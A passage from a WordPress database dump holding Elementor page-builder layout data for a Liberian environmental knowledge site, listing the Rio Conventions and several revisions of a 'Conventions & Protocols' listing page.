\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11551,1880,'_elementor_version','2.7.5'),(11552,1880,'_elementor_template_type','wp-page'),(11553,1880,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11556,84,'osh_disable_topbar_sticky','default'),(11557,84,'osh_disable_header_sticky','default'),(11558,84,'osh_sticky_header_style','default'),(11559,84,'_elementor_edit_mode','builder'),(11560,84,'_elementor_template_type','wp-page'),(11561,84,'_elementor_version','3.6.6'),(11568,84,'_wp_page_template','default'),(11569,84,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\"}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8043d05\",\"elType\":\"widget\",\"settings\":{\"number\":10,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"mea_resource\",\"title_trimmed_ending_text\":\"...\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"8a63abb\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"e5c76dd\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5637a09\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"97f9083\"}]},\"elements\":[{\"id\":\"0f20919\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5d8a038\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b73161c\"}]},\"elements\":[{\"id\":\"1dd8ad2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(11570,1882,'_elementor_controls_usage','a:0:{}'),(11571,1882,'_elementor_edit_mode','builder'),(11572,1882,'_elementor_template_type','wp-page'),(11573,1882,'_elementor_version','2.7.5'),(11574,1882,'_wp_page_template','default'),(11575,1882,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"title_tag\":\"h1\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"is_archive_template\":\"yes\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11577,1883,'_elementor_edit_mode','builder'),(11578,1883,'_elementor_template_type','wp-page'),(11579,1883,'_elementor_version','2.7.5'),(11580,1883,'_wp_page_template','default'),(11581,1883,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"title_tag\":\"h1\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"6\",\"image_size\":\"medium\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11584,1884,'_elementor_edit_mode','builder'),(11585,1884,'_elementor_template_type','wp-page'),(11586,1884,'_elementor_version','2.7.5'),(11587,1884,'_wp_page_template','default'),(11588,1884,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"title_tag\":\"h1\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"6\",\"image_size\":\"medium\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11590,1885,'_elementor_edit_mode','builder'),(11591,1885,'_elementor_template_type','wp-page'),(11592,1885,'_elementor_version','2.7.5'),(11593,1885,'_wp_page_template','default'),(11594,1885,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"title_tag\":\"h1\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"6\",\"image_size\":\"medium\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11596,1886,'_elementor_edit_mode','builder'),(11597,1886,'_elementor_template_type','wp-page'),(11598,1886,'_elementor_version','2.7.5'),(11599,1886,'_wp_page_template','default'),(11600,1886,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"title_tag\":\"h1\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"6\",\"image_size\":\"medium\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11610,1888,'_elementor_edit_mode','builder'),(11611,1888,'_elementor_template_type','wp-page'),(11612,1888,'_elementor_version','2.7.5'),(11613,1888,'_wp_page_template','default'),(11614,1888,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11616,1889,'_elementor_edit_mode','builder'),(11617,1889,'_elementor_template_type','wp-page'),(11618,1889,'_elementor_version','2.7.5'),(11619,1889,'_wp_page_template','default'),(11620,1889,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"hidden_items_icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11622,1890,'_elementor_edit_mode','builder'),(11623,1890,'_elementor_template_type','wp-page'),(11624,1890,'_elementor_version','2.7.5'),(11625,1890,'_wp_page_template','default'),(11626,1890,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa 